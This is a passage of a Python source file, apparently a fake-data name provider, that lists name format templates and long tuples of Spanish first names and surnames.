"{{first_name_male}} {{last_name}} {{last_name}}",
"{{first_name_male}} {{last_name}}",
"{{first_name_male}} {{prefix}} {{last_name}}",
"{{first_name_male}} {{last_name}}-{{last_name}}",
"{{first_name_male}} {{first_name_male}} {{last_name}} {{last_name}}",
)
formats_female: Tuple[str, ...] = (
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}} {{last_name}}",
"{{first_name_female}} {{last_name}}",
"{{first_name_female}} {{prefix}} {{last_name}}",
"{{first_name_female}} {{last_name}}-{{last_name}}",
"{{first_name_female}} {{first_name_female}} {{last_name}} {{last_name}}",
)
formats: Tuple[str, ...] = formats_male + formats_female
# 477 male first names, alphabetically.
# Source: Álvaro Mondéjar Rubio <[email protected]>
first_names_male: Tuple[str, ...] = (
"Aarón",
"Abel",
"Abilio",
"Abraham",
"Adalberto",
"Adelardo",
"Adolfo",
"Adrián",
"Adán",
"Agapito",
"Agustín",
"Aitor",
"Albano",
"Albert",
"Alberto",
"Albino",
"Alcides",
"Ale",
"Alejandro",
"Alejo",
"Alex",
"Alfonso",
"Alfredo",
"Alonso",
"Amado",
"Amador",
"Amancio",
"Amando",
"Amaro",
"Ambrosio",
"Amor",
"Américo",
"Amílcar",
"Anacleto",
"Anastasio",
"Andrés",
"Andrés Felipe",
"Angelino",
"Anselmo",
"Antonio",
"Aníbal",
"Apolinar",
"Ariel",
"Aristides",
"Armando",
"Arsenio",
"Artemio",
"Arturo",
"Asdrubal",
"Atilio",
"Augusto",
"Aureliano",
"Aurelio",
"Baldomero",
"Balduino",
"Baltasar",
"Bartolomé",
"Basilio",
"Baudelio",
"Bautista",
"Benigno",
"Benito",
"Benjamín",
"Bernabé",
"Bernardino",
"Bernardo",
"Berto",
"Blas",
"Bonifacio",
"Borja",
"Bruno",
"Buenaventura",
"Calisto",
"Calixto",
"Camilo",
"Candelario",
"Carlito",
"Carlos",
"Carmelo",
"Casemiro",
"Cayetano",
"Cebrián",
"Cecilio",
"Ceferino",
"Celestino",
"Celso",
"Cesar",
"Che",
"Chema",
"Chucho",
"Chus",
"Chuy",
"Cipriano",
"Ciriaco",
"Cirino",
"Ciro",
"Ciríaco",
"Claudio",
"Clemente",
"Cleto",
"Clímaco",
"Conrado",
"Cornelio",
"Cosme",
"Cristian",
"Cristian",
"Cristóbal",
"Cruz",
"Curro",
"Custodio",
"Cándido",
"César",
"Damián",
"Dan",
"Dani",
"Daniel",
"Danilo",
"Darío",
"David",
"Demetrio",
"Desiderio",
"Diego",
"Dimas",
"Dionisio",
"Domingo",
"Donato",
"Duilio",
"Edelmiro",
"Edgardo",
"Edmundo",
"Edu",
"Eduardo",
"Efraín",
"Eladio",
"Eleuterio",
"Eligio",
"Eliseo",
"Eloy",
"Elpidio",
"Elías",
"Emigdio",
"Emiliano",
"Emilio",
"Enrique",
"Epifanio",
"Erasmo",
"Eric",
"Ernesto",
"Espiridión",
"Esteban",
"Eugenio",
"Eusebio",
"Eustaquio",
"Eutimio",
"Eutropio",
"Evaristo",
"Ezequiel",
"Fabio",
"Fabián",
"Fabricio",
"Faustino",
"Fausto",
"Federico",
"Feliciano",
"Felipe",
"Felix",
"Fermín",
"Fernando",
"Fidel",
"Fito",
"Flavio",
"Florencio",
"Florentino",
"Fortunato",
"Francisco",
"Francisco Javier",
"Francisco Jose",
"Fulgencio",
"Félix",
"Gabino",
"Gabriel",
"Galo",
"Gaspar",
"Gastón",
"Geraldo",
"Gerardo",
"Germán",
"Gervasio",
"Gerónimo",
"Gil",
"Gilberto",
"Glauco",
"Godofredo",
"Gonzalo",
"Goyo",
"Graciano",
"Gregorio",
"Guadalupe",
"Guillermo",
"Guiomar",
"Gustavo",
"Haroldo",
"Hector",
"Heliodoro",
"Heraclio",
"Herberto",
"Heriberto",
"Hermenegildo",
"Herminio",
"Hernando",
"Hernán",
"Hilario",
"Hipólito",
"Horacio",
"Hugo",
"Humberto",
"Héctor",
"Ibán",
"Ignacio",
"Iker",
"Ildefonso",
"Inocencio",
"Isaac",
"Isaías",
"Isidoro",
"Isidro",
"Ismael",
"Iván",
"Jacinto",
"Jacobo",
"Jafet",
"Jaime",
"Javi",
"Javier",
"Jenaro",
"Jeremías",
"Jerónimo",
"Jesús",
"Joan",
"Joaquín",
"Joel",
"Jonatan",
"Jordi",
"Jordán",
"Jorge",
"Jose",
"Jose Angel",
"Jose Antonio",
"Jose Carlos",
"Jose Francisco",
"Jose Ignacio",
"Jose Luis",
"Jose Manuel",
"Jose Miguel",
"Jose Ramón",
"Josep",
"Josué",
"José",
"José Antonio",
"José Luis",
"José Manuel",
"José Mari",
"José María",
"José Ángel",
"Juan",
"Juan Antonio",
"Juan Bautista",
"Juan Carlos",
"Juan Francisco",
"Juan José",
"Juan Luis",
"Juan Manuel",
"Juan Pablo",
"Juanito",
"Julio",
"Julio César",
"Julián",
"Kike",
"Lalo",
"Leandro",
"Leocadio",
"Leonardo",
"Leoncio",
"Leonel",
"Leopoldo",
"León",
"Lino",
"Lisandro",
"Lope",
"Lorenzo",
"Loreto",
"Lucas",
"Lucho",
"Luciano",
"Lucio",
"Luis",
"Luis Miguel",
"Luis Ángel",
"Lupe",
"Luís",
"Lázaro",
"Macario",
"Manolo",
"Manu",
"Manuel",
"Marc",
"Marcelino",
"Marcelo",
"Marcial",
"Marciano",
"Marcio",
"Marco",
"Marcos",
"Mariano",
"Marino",
"Mario",
"Martin",
"Martín",
"María",
"Mateo",
"Matías",
"Mauricio",
"Maxi",
"Maximiano",
"Maximiliano",
"Maximino",
"Melchor",
"Miguel",
"Miguel Ángel",
"Modesto",
"Mohamed",
"Moisés",
"Moreno",
"Máximo",
"Nacho",
"Nacio",
"Nando",
"Narciso",
"Natalio",
"Natanael",
"Nazaret",
"Nazario",
"Nicanor",
"Nico",
"Nicodemo",
"Nicolás",
"Nilo",
"Norberto",
"Noé",
"Néstor",
"Octavio",
"Olegario",
"Omar",
"Onofre",
"Osvaldo",
"Ovidio",
"Pablo",
"Paco",
"Pancho",
"Pascual",
"Pastor",
"Patricio",
"Paulino",
"Pedro",
"Pelayo",
"Pepe",
"Pepito",
"Plinio",
"Plácido",
"Poncio",
"Porfirio",
"Primitivo",
"Prudencio",
"Pánfilo",
"Pío",
"Quique",
"Quirino",
"Rafa",
"Rafael",
"Raimundo",
"Ramiro",
"Ramón",
"Raúl",
"Reinaldo",
"Remigio",
"Renato",
"René",
"Reyes",
"Reynaldo",
"Ricardo",
"Rico",
"Roberto",
"Rodolfo",
"Rodrigo",
"Rogelio",
"Rolando",
"Roldán",
"Román",
"Roque",
"Rosario",
"Rosendo",
"Ruben",
"Rubén",
"Rufino",
"Ruperto",
"Ruy",
"Régulo",
"Rómulo",
"Sabas",
"Salomón",
"Salvador",
"Samu",
"Samuel",
"Sancho",
"Sandalio",
"Santiago",
"Santos",
"Saturnino",
"Sebastian",
"Sebastián",
"Segismundo",
"Sergio",
"Seve",
"Severiano",
"Severino",
"Severo",
"Sigfrido",
"Silvestre",
"Silvio",
"Simón",
"Sosimo",
"Tadeo",
"Telmo",
"Teo",
"Teobaldo",
"Teodoro",
"Teodosio",
"Teófilo",
"Tiburcio",
"Timoteo",
"Tito",
"Tomás",
"Toni",
"Toribio",
"Toño",
"Trinidad",
"Tristán",
"Ulises",
"Urbano",
"Valentín",
"Valerio",
"Valero",
"Vasco",
"Venceslás",
"Vicente",
"Victor",
"Victor Manuel",
"Victoriano",
"Victorino",
"Vidal",
"Vinicio",
"Virgilio",
"Vito",
"Víctor",
"Wilfredo",
"Wálter",
"Xavier",
"Yago",
"Zacarías",
"Álvaro",
"Ángel",
"Édgar",
"Íñigo",
"Óscar",
)
# 477 female first names, alphabetically.
# Source: Álvaro Mondéjar Rubio <[email protected]>
first_names_female: Tuple[str, ...] = (
"Abigaíl",
"Abril",
"Adela",
"Adelaida",
"Adelia",
"Adelina",
"Adora",
"Adoración",
"Adriana",
"Agustina",
"Ainara",
"Ainoa",
"Aitana",
"Alba",
"Albina",
"Ale",
"Alejandra",
"Alexandra",
"Alicia",
"Alma",
"Almudena",
"Alondra",
"Amada",
"Amalia",
"Amanda",
"Amarilis",
"Amaya",
"Amelia",
"Amor",
"Amparo",
"América",
"Ana",
"Ana Belén",
"Ana Sofía",
"Anabel",
"Anastasia",
"Andrea",
"Angelina",
"Angelita",
"Angélica",
"Ani",
"Anita",
"Anna",
"Anselma",
"Antonia",
"Anunciación",
"Apolonia",
"Araceli",
"Arcelia",
"Ariadna",
"Ariel",
"Armida",
"Aroa",
"Aránzazu",
"Ascensión",
"Asunción",
"Aura",
"Aurelia",
"Aurora",
"Azahar",
"Azahara",
"Azeneth",
"Azucena",
"Beatriz",
"Begoña",
"Belen",
"Belén",
"Benigna",
"Benita",
"Bernarda",
"Bernardita",
"Berta",
"Bibiana",
"Bienvenida",
"Blanca",
"Brunilda",
"Brígida",
"Bárbara",
"Calista",
"Calixta",
"Camila",
"Candela",
"Candelaria",
"Candelas",
"Caridad",
"Carina",
"Carla",
"Carlota",
"Carmela",
"Carmelita",
"Carmen",
"Carmina",
"Carolina",
"Casandra",
"Catalina",
"Cayetana",
"Cecilia",
"Celestina",
"Celia",
"Charo",
"Chelo",
"Chita",
"Chus",
"Cintia",
"Clara",
"Clarisa",
"Claudia",
"Clementina",
"Cloe",
"Clotilde",
"Concepción",
"Concha",
"Constanza",
"Consuela",
"Consuelo",
"Coral",
"Corona",
"Crescencia",
"Cristina",
"Cruz",
"Custodia",
"Cándida",
"Dafne",
"Dalila",
"Daniela",
"Delfina",
"Delia",
"Diana",
"Dionisia",
"Dolores",
"Dominga",
"Domitila",
"Dora",
"Dorita",
"Dorotea",
"Dulce",
"Débora",
"Edelmira",
"Elba",
"Elena",
"Eli",
"Eliana",
"Eligia",
"Elisa",
"Elisabet",
"Elodia",
"Eloísa",
"Elvira",
"Ema",
"Emelina",
"Emilia",
"Emiliana",
"Emma",
"Emperatriz",
"Encarna",
"Encarnacion",
"Encarnación",
"Encarnita",
"Esmeralda",
"Esperanza",
"Estefanía",
"Estela",
"Ester",
"Esther",
"Estrella",
"Etelvina",
"Eufemia",
"Eugenia",
"Eulalia",
"Eusebia",
"Eva",
"Eva María",
"Evangelina",
"Evelia",
"Evita",
"Fabiana",
"Fabiola",
"Fanny",
"Febe",
"Felicia",
"Feliciana",
"Felicidad",
"Felipa",
"Felisa",
"Fernanda",
"Fidela",
"Filomena",
"Flavia",
"Flor",
"Flora",
"Florencia",
"Florentina",
"Florina",
"Florinda",
"Fortunata",
"Francisca",
"Fátima",
"Gabriela",
"Gala",
"Gema",
"Genoveva",
"Georgina",
"Gertrudis",
"Gisela",
"Gloria",
"Gracia",
"Graciana",
"Graciela",
"Griselda",
"Guadalupe",
"Guiomar",
"Haydée",
"Herminia",
"Hilda",
"Hortensia",
"Ignacia",
"Ileana",
"Imelda",
"Inmaculada",
"Inés",
"Irene",
"Iris",
"Irma",
"Isa",
"Isabel",
"Isabela",
"Isaura",
"Isidora",
"Itziar",
"Jacinta",
"Javiera",
"Jennifer",
"Jenny",
"Jessica",
"Jesusa",
"Jimena",
"Joaquina",
"Jordana",
"Josefa",
"Josefina",
"José",
"Jovita",
"Juana",
"Juanita",
"Judith",
"Julia",
"Juliana",
"Julie",
"Julieta",
"Lara",
"Laura",
"Leandra",
"Leire",
"Leocadia",
"Leonor",
"Leticia",
"Leyre",
"Lidia",
"Ligia",
"Lilia",
"Liliana",
"Lina",
"Loida",
"Lola",
"Lorena",
"Lorenza",
"Loreto",
"Lourdes",
"Luciana",
"Lucila",
"Lucía",
"Luisa",
"Luisina",
"Luna",
"Lupe",
"Lupita",
"Luz",
"Macarena",
"Macaria",
"Magdalena",
"Maite",
"Malena",
"Mamen",
"Manola",
"Manu",
"Manuela",
"Manuelita",
"Mar",
"Marcela",
"Marcia",
"Margarita",
"Mariana",
"Marianela",
"Maribel",
"Maricela",
"Maricruz",
"Marina",
"Marisa",
"Marisela",
"Marisol",
"Maristela",
"Marita",
"Marta",
"Martina",
"Martirio",
"María",
"María Belén",
"María Carmen",
"María Cristina",
"María Del Carmen",
"María Dolores",
"María Fernanda",
"María Jesús",
"María José",
"María Luisa",
"María Manuela",
"María Pilar",
"María Teresa",
"María Ángeles",
"Matilde",
"Maura",
"Maxi",
"Mayte",
"Melania",
"Melisa",
"Mercedes",
"Merche",
"Micaela",
"Miguela",
"Milagros",
"Mireia",
"Miriam",
"Mirta",
"Modesta",
"Montserrat",
"Morena",
"Máxima",
"Mónica",
"Nadia",
"Narcisa",
"Natalia",
"Natividad",
"Nayara",
"Nazaret",
"Nerea",
"Nereida",
"Nicolasa",
"Nidia",
"Nieves",
"Nilda",
"Noa",
"Noelia",
"Noemí",
"Nuria",
"Nydia",
"Nélida",
"Obdulia",
"Octavia",
"Odalis",
"Odalys",
"Ofelia",
"Olalla",
"Olga",
"Olimpia",
"Olivia",
"Oriana",
"Otilia",
"Paca",
"Pacífica",
"Palmira",
"Paloma",
"Paola",
"Pascuala",
"Pastora",
"Patricia",
"Paula",
"Paulina",
"Paz",
"Pepita",
"Perla",
"Perlita",
"Petrona",
"Piedad",
"Pilar",
"Pili",
"Primitiva",
"Priscila",
"Prudencia",
"Purificación",
"Pía",
"Rafaela",
"Ramona",
"Raquel",
"Rebeca",
"Regina",
"Reina",
"Remedios",
"Renata",
"Reyes",
"Reyna",
"Ricarda",
"Rita",
"Roberta",
"Rocío",
"Rosa",
"Rosa María",
"Rosalina",
"Rosalinda",
"Rosalva",
"Rosalía",
"Rosario",
"Rosaura",
"Rosenda",
"Roxana",
"Rufina",
"Ruperta",
"Ruth",
"Sabina",
"Salomé",
"Salud",
"Samanta",
"Sandra",
"Sara",
"Sarita",
"Saturnina",
"Selena",
"Serafina",
"Silvia",
"Socorro",
"Sofía",
"Sol",
"Soledad",
"Sonia",
"Soraya",
"Susana",
"Susanita",
"Tamara",
"Tania",
"Tatiana",
"Tecla",
"Teodora",
"Tere",
"Teresa",
"Teresita",
"Teófila",
"Tomasa",
"Trini",
"Trinidad",
"Valentina",
"Valeria",
"Vanesa",
"Vera",
"Verónica",
"Vicenta",
"Victoria",
"Vilma",
"Violeta",
"Virginia",
"Visitación",
"Viviana",
"Ximena",
"Xiomara",
"Yaiza",
"Yolanda",
"Yésica",
"Yéssica",
"Zaida",
"Zaira",
"Zoraida",
"África",
"Ágata",
"Águeda",
"Ámbar",
"Ángela",
"Ángeles",
"Áurea",
"Íngrid",
"Úrsula",
)
first_names = first_names_male + first_names_female
last_names = (
"Abad",
"Abascal",
"Abella",
"Abellán",
"Abril",
"Acedo",
"Acero",
"Acevedo",
"Acosta",
"Acuña",
"Adadia",
"Adán",
"Aguado",
"Agudo",
"Aguilar",
"Aguilera",
"Aguiló",
"Aguirre",
"Agullo",
"Agustí",
"Agustín",
"Alarcón",
"Alba",
"Alberdi",
"Albero",
"Alberola",
"Alberto",
"Alcalde",
"Alcalá",
"Alcaraz",
"Alcolea",
"Alcántara",
"Alcázar",
"Alegre",
"Alegria",
"Alemany",
"Alemán",
"Alfaro",
"Alfonso",
"Aliaga",
"Aller",
"Almagro",
"Almansa",
"Almazán",
"Almeida",
"Alonso",
"Alsina",
"Alvarado",
"Alvarez",
"Amador",
"Amat",
"Amaya",
"Amigó",
"Amo",
"Amor",
"Amores",
"Amorós",
"Anaya",
"Andrade",
"Andres",
"Andreu",
"Andrés",
"Anglada",
"Anguita",
"Angulo",
"Antón",
"Antúnez",
"Aparicio",
"Aragonés",
"Aragón",
"Aramburu",
"Arana",
"Aranda",
"Araujo",
"Arce",
"Arco",
"Arcos",
"Arellano",
"Arenas",
"Arias",
"Ariza",
"Ariño",
"Arjona",
"Armas",
"Armengol",
"Arnaiz",
"Arnal",
"Arnau",
"Aroca",
"Arranz",
"Arregui",
"Arribas",
"Arrieta",
"Arroyo",
"Arteaga",
"Artigas",
"Arévalo",
"Asenjo",
"Asensio",
"Atienza",
"Avilés",
"Ayala",
"Ayllón",
"Ayuso",
"Azcona",
"Aznar",
"Azorin",
"Badía",
"Baena",
"Baeza",
"Balaguer",
"Ballester",
"Ballesteros",
"Baquero",
"Barba",
"Barbero",
"Barberá",
"Barceló",
"Barco",
"Barragán",
"Barral",
"Barranco",
"Barreda",
"Barrena",
"Barrera",
"Barriga",
"Barrio",
"Barrios",
"Barros",
"Barroso",
"Bartolomé",
"Baró",
"Barón",
"Bas",
"Bastida",
"Batalla",
"Batlle",
"Bautista",
"Bauzà",
"Bayo",
"Bayona",
"Bayón",
"Baños",
"Becerra",
"Bejarano",
"Belda",
"Bellido",
"Bello",
"Belmonte",
"Beltran",
"Beltrán",
"Benavent",
"Benavente",
"Benavides",
"Benet",
"Benitez",
"Benito",
"Benítez",
"Berenguer",
"Bermejo",
"Bermudez",
"Bermúdez",
"Bernad",
"Bernal",
"Bernat",
"Berrocal",
"Bertrán",
"Bilbao",
"Blanca",
"Blanch",
"Blanco",
"Blanes",
"Blasco",
"Blazquez",
"Blázquez",
"Boada",
"Boix",
"Bolaños",
"Bonet",
"Bonilla",
"Borja",
"Borrego",
"Borrell",
"Borrás",
"Bosch",
"Botella",
"Bou",
"Bravo",
"Briones",
"Bru",
"Buendía",
"Bueno",
"Burgos",
"Busquets",
"Bustamante",
"Bustos",
"Báez",
"Bárcena",
"Caballero",
"Cabanillas",
"Cabañas",
"Cabello",
"Cabeza",
"Cabezas",
"Cabo",
"Cabrera",
"Cabrero",
"Cadenas",
"Cal",
"Calatayud",
"Calderon",
"Calderón",
"Calleja",
"Calvet",
"Calvo",
"Calzada",
"Camacho",
"Camino",
"Campillo",
"Campo",
"Campos",
"Campoy",
"Camps",
"Canales",
"Canals",
"Canet",
"Cano",
"Cantero",
"Cantón",
"Caparrós",
"Capdevila",
"Carbajo",
"Carballo",
"Carbonell",
"Carbó",
"Cardona",
"Carlos",
"Carmona",
"Carnero",
"Caro",
"Carpio",
"Carranza",
"Carrasco",
"Carrera",
"Carreras",
"Carretero",
"Carreño",
"Carrillo",
"Carrión",
"Carro",
"Carvajal",
"Casado",
"Casal",
"Casals",
"Casanova",
"Casanovas",
"Casares",
"Casas",
"Cases",
"Castañeda",
"Castejón",
"Castell",
"Castellanos",
"Castells",
"Castelló",
"Castilla",
"Castillo",
"Castrillo",
"Castro",
"Catalá",
"Catalán",
"Cazorla",
"Cañas",
"Cañellas",
"Cañete",
"Cañizares",
"Cepeda",
"Cerdá",
"Cerdán",
"Cerezo",
"Cerro",
"Cervantes",
"Cervera",
"Chacón",
"Chamorro",
"Chaparro",
"Chaves",
"Checa",
"Chico",
"Cid",
"Cifuentes",
"Cisneros",
"Clavero",
"Clemente",
"Cobo",
"Cobos",
"Coca",
"Codina",
"Coello",
"Coll",
"Collado",
"Colom",
"Coloma",
"Colomer",
"Comas",
"Company",
"Conde",
"Conesa",
"Contreras",
"Corbacho",
"Cordero",
"Cornejo",
"Corominas",
"Coronado",
"Corral",
"Correa",
"Cortes",
"Cortina",
"Cortés",
"Costa",
"Crespi",
"Crespo",
"Criado",
"Cruz",
"Cuadrado",
"Cuenca",
"Cuervo",
"Cuesta",
"Cueto",
"Cuevas",
"Cuéllar",
"Cáceres",
"Cámara",
"Cánovas",
"Cárdenas",
"Céspedes",
"Córdoba",
"Cózar",
"Dalmau",
"Daza",
"Delgado",
"Diaz",
"Diego",
"Diez",
"Diéguez",
"Domingo",
"Dominguez",
"Doménech",
"Domínguez",
"Donaire",
"Donoso",
"Duarte",
"Dueñas",
"Duque",
"Duran",
"Durán",
"Dávila",
"Díaz",
"Díez",
"Echevarría",
"Echeverría",
"Egea",
"Elorza",
"Elías",
"Enríquez",
"Escalona",
"Escamilla",
"Escobar",
"Escolano",
"Escribano",
"Escrivá",
"Escudero",
"Espada",
"Esparza",
"España",
"Español",
"Espejo",
"Espinosa",
"Esteban",
"Esteve",
"Estevez",
"Estrada",
"Estévez",
"Exposito",
"Expósito",
"Fabra",
"Fabregat",
"Fajardo",
"Falcó",
"Falcón",
"Farré",
"Feijoo",
"Feliu",
"Fernandez",
"Fernández",
"Ferrando",
"Ferrer",
"Ferrera",
"Ferreras",
"Ferrero",
"Ferrán",
"Ferrández",
"Ferrándiz",
"Figueras",
"Figueroa",
"Figuerola",
"Fiol",
"Flor",
"Flores",
"Folch",
"Fonseca",
"Font",
"Fortuny",
"Franch",
"Francisco",
"Franco",
"Frutos",
"Frías",
"Fuente",
"Fuentes",
"Fuertes",
"Fuster",
"Fábregas",
"Gabaldón",
"Galan",
"Galiano",
"Galindo",
"Gallardo",
"Gallart",
"Gallego",
"Gallo",
"Galvez",
"Galván",
"Galán",
"Garay",
"Garcia",
"Garcés",
"García",
"Gargallo",
"Garmendia",
"Garrido",
"Garriga",
"Garzón",
"Gascón",
"Gaya",
"Gelabert",
"Gibert",
"Gil",
"Gilabert",
"Gimenez",
"Gimeno",
"Giménez",
"Giner",
"Giralt",
"Girona",
"Girón",
"Gisbert",
"Godoy",
"Goicoechea",
"Gomez",
"Gomila",
"Gomis",
"Gonzalez",
"Gonzalo",
"González",
"Gordillo",
"Goñi",
"Gracia",
"Granados",
"Grande",
"Gras",
"Grau",
"Gual",
"Guardia",
"Guardiola",
"Guerra",
"Guerrero",
"Guijarro",
"Guillen",
"Guillén",
"Guitart",
"Gutierrez",
"Gutiérrez",
"Guzman",
"Guzmán",
"Gálvez",
"Gámez",
"Gárate",
"Gómez",
"Haro",
"Heras",
"Heredia",
"Hernandez",
"Hernando",
"Hernández",
"Herranz",
"Herrera",
"Herrero",
"Hervia",
"Hervás",
"Hidalgo",
"Hierro",
"Higueras",
"Hoyos",
"Hoz",
"Huerta",
"Huertas",
"Huguet",
"Hurtado",
"Ibarra",
"Ibañez",
"Iborra",
"Ibáñez",
"Iglesia",
"Iglesias",
"Infante",
"Iniesta",
"Iriarte",
"Isern",
"Izaguirre",
"Izquierdo",
"Iñiguez",
"Jara",
"Jaume",
"Jaén",
"Jerez",
"Jimenez",
"Jiménez",
"Jordá",
"Jordán",
"Jove",
"Jover",
"Juan",
"Juliá",
"Julián",
"Jurado",
"Juárez",
"Jáuregui",
"Jódar",
"Lago",
"Laguna",
"Lamas",
"Landa",
"Lara",
"Larrañaga",
"Larrea",
"Lasa",
"Lastra",
"Leal",
"Ledesma",
"Leiva",
"Leon",
"Lerma",
"León",
"Lillo",
"Linares",
"Llabrés",
"Lladó",
"Llamas",
"Llano",
"Llanos",
"Lledó",
"Llobet",
"Llopis",
"Llorens",
"Llorente",
"Lloret",
"Lluch",
"Lobato",
"Lobo",
"Lopez",
"Lorenzo",
"Losa",
"Losada",
"Lozano",
"Lucas",
"Lucena",
"Luján",
"Lumbreras",
"Luna",
"Luque",
"Luz",
"Luís",
"López",
"Machado",
"Macias",
"Macías",
"Madrid",
"Madrigal",
"Maestre",
"Maldonado",
"Malo",
"Mancebo",
"Manjón",
"Manrique",
"Manso",
"Manuel",
"Manzanares",
"Manzano",
"Marco",
"Marcos",
"Marin",
"Mariscal",
"Mariño",
"Marquez",
"Marqués",
"Marti",
"Martin",
"Martinez",
"Martorell",
"Martí",
"Martín",
"Martínez",
"Marí",
"Marín",
"Mas",
"Mascaró",
"Mata",
"Matas",
"Mate",
"Mateo",
"Mateos",
"Mateu",
"Mayo",
"Mayol",
"Mayoral",
"Maza",
"Medina",
"Melero",
"Meléndez",
"Mena",
"Mendez",
"Mendizábal",
"Mendoza",
"Menendez",
"Menéndez",
"Mercader",
"Merino",
"Mesa",
"Miguel",
"Milla",
"Millán",
"Mir",
"Miralles",
"Miranda",
"Miró",
"Moles",
"Molina",
"Moliner",
"Molins",
"Moll",
"Monreal",
"Montalbán",
"Montaña",
"Montenegro",
"Montero",
"Montes",
"Montesinos",
"Montoya",
"Montserrat",
"Mora",
"Moraleda",
"Morales",
"Morante",
"Morata",
"Morcillo",
"Morell",
"Moreno",
"Morera",
"Morillo",
"Morán",
"Mosquera",
"Moya",
"Mulet",
"Mur",
"Murcia",
"Murillo",
"Muro",
"Muñoz",
"Mármol",
"Márquez",
"Méndez",
"Mínguez",
"Múgica",
"Múñiz",
"Nadal",
"Naranjo",
"Narváez",
"Navarrete",
"Navarro",
"Navas",
"Nebot",
"Neira",
"Nevado",
"Nicolau",
"Nicolás",
"Nieto",
"Niño",
"Nogueira",
"Noguera",
"Nogués",
"Noriega",
"Novoa",
"Nuñez",
"Núñez",
"Ocaña",
"Ochoa",
"Ojeda",
"Oliva",
"Olivares",
"Oliver",
"Olivera",
"Oliveras",
"Olivé",
"Oller",
"Olmedo",
"Olmo",
"Ordóñez",
"Orozco",
"Ortega",
"Ortiz",
"Ortuño",
"Osorio",
"Osuna",
"Otero",
"Pablo",
"Pacheco",
"Padilla",
"Pagès",
"Palacio",
"Palacios",
"Palau",
"Pallarès",
"Palma",
"Palmer",
"Palomar",
"Palomares",
"Palomino",
"Palomo",
"Paniagua",
"Pardo",
"Paredes",
"Pareja",
"Parejo",
"Parra",
"Pascual",
"Pastor",
"Patiño",
"Pavón",
"Paz",
"Pazos",
"Pedraza",
"Pedrero",
"Pedro",
"Pedrosa",
"Peinado",
"Peiró",
"Pelayo",
"Pellicer",
"Peláez",
"Pera",
"Peral",
"Perales",
"Peralta",
"Perea",
"Pereira",
"Perelló",
"Perera",
"Perez",
"Peña",
"Peñalver",
"Peñas",
"Pi",
"Pina",
"Pineda",
"Pinedo",
"Pinilla",
"Pino",
"Pinto",
"Pintor",
"Piquer",
"Pizarro",
"Piña",
"Piñeiro",
"Piñol",
"Pla",
"Plana",
"Planas",
"Plaza",
"Pol",
"Polo",
"Pomares",
"Pombo",
"Ponce",
"Pons",
"Pont",
"Porcel",
"Porras",
"Porta",
"Portero",
"Portillo",
"Posada",
"Pou",
"Poza",
"Pozo",
"Pozuelo",
"Prada",
"Prado",
"Prat",
"Prats",
"Priego",
"Prieto",
"Puente",
"Puerta",
"Puga",
"Puig",
"Pujadas",
"Pujol",
"Pulido",
"Páez",
"Pérez",
"Quero",
"Querol",
"Quesada",
"Quevedo",
"Quintana",
"Quintanilla",
"Quintero",
"Quiroga",
"Quirós",
"Ramirez",
"Ramis",
"Ramos",
"Ramírez",
"Ramón",
"Raya",
"Real",
"Rebollo",
"Recio",
"Redondo",
"Reguera",
"Reig",
"Reina",
"Requena",
"Revilla",
"Rey",
"Reyes",
"Riba",
"Ribas",
"Ribera",
"Ribes",
"Ricart",
"Rico",
"Riera",
"Rincón",
"Rios",
"Ripoll",
"Riquelme",
"Rius",
"Rivas",
"Rivera",
"Rivero",
"Robledo",
"Robles",
"Roca",
"Rocamora",
"Rocha",
"Roda",
"Rodrigo",
"Rodriguez",
"Rodríguez",
"Roig",
"Rojas",
"Roldan",
"Roldán",
"Roma",
"Roman",
"Romero",
"Romeu",
"Román",
"Ropero",
"Ros",
"Rosa",
"Rosado",
"Rosales",
"Rosell",
"Roselló",
"Rosselló",
"Roura",
"Rovira",
"Royo",
"Rozas",
"Ruano",
"Rubio",
"Rueda",
"Ruiz",
"Río",
"Ríos",
"Ródenas",
"Saavedra",
"Sabater",
"Sacristán",
"Saez",
"Sainz",
"Sala",
"Salamanca",
"Salas",
"Salazar",
"Salcedo",
"Saldaña",
"Sales",
"Salgado",
"Salinas",
"Salmerón",
"Salom",
"Salvador",
"Salvà",
"Samper",
"Sanabria",
"Sanchez",
"Sancho",
"Sandoval",
"Sanjuan",
"Sanmartín",
"Sanmiguel",
"Sans",
"Santamaria",
"Santamaría",
"Santana",
"Santiago",
"Santos",
"Sanz",
"Sarabia",
"Sarmiento",
"Sastre",
"Saura",
"Sebastián",
"Seco",
"Sedano",
"Segarra",
"Segovia",
"Segura",
"Seguí",
"Serna",
"Serra",
"Serrano",
"Sevilla",
"Sevillano",
"Sierra",
"Silva",
"Simó",
"Sobrino",
"Sola",
"Solana",
"Solano",
"Soler",
"Solera",
"Solsona",
"Solé",
"Solís",
"Somoza",
"Soria",
"Soriano",
"Sosa",
"Sotelo",
"Soto",
"Suarez",
"Sureda",
"Suárez",
"Sáenz",
"Sáez",
"Sánchez",
"Taboada",
"Talavera",
"Tamarit",
"Tamayo",
"Tapia",
"Tejada",
"Tejedor",
"Tejera",
"Tejero",
"Tello",
"Tena",
"Tenorio",
"Terrón",
"Teruel",
"Tirado",
"Toledo",
"Tolosa",
"Tomas",
"Tomás",
"Tomé",
"Tormo",
"Toro",
"Torralba",
"Torre",
"Torrecilla",
"Torrens",
"Torrent",
"Torrents",
"Torres",
"Torrijos",
"Tovar",
"Trillo",
"Trujillo",
"Tudela",
"Tur",
"Téllez",
"Ugarte",
"Ureña",
"Uriarte",
"Uribe",
"Urrutia",
"Uría",
"Valbuena",
"Valcárcel",
"Valderrama",
"Valdés",
"Valencia",
"Valenciano",
"Valentín",
"Valenzuela",
"Valera",
"Valero",
"Vall",
"Valle",
"Vallejo",
"Valls",
"Vallés",
"Valverde",
"Vaquero",
"Vara",
"Varela",
"Vargas",
"Vazquez",
"Vega",
"Velasco",
"Velázquez",
"Vendrell",
"Vera",
"Verdejo",
"Verdugo",
"Verdú",
"Vergara",
"Viana",
"Vicens",
"Vicente",
"Vidal",
"Vigil",
"Vila",
"Vilalta",
"Vilanova",
"Vilaplana",
"Vilar",
"Villa",
"Villalba",
"Villalobos",
"Villalonga",
"Villanueva",
"Villar",
"Villaverde",
"Villegas",
"Villena",
"Vives",
"Vizcaíno",
"Viña",
"Viñas",
"Vázquez",
"Vélez",
"Yuste",
"Yáñez",
"Zabala",
"Zabaleta",
"Zamora",
"Zamorano",
"Zapata",
"Zaragoza",
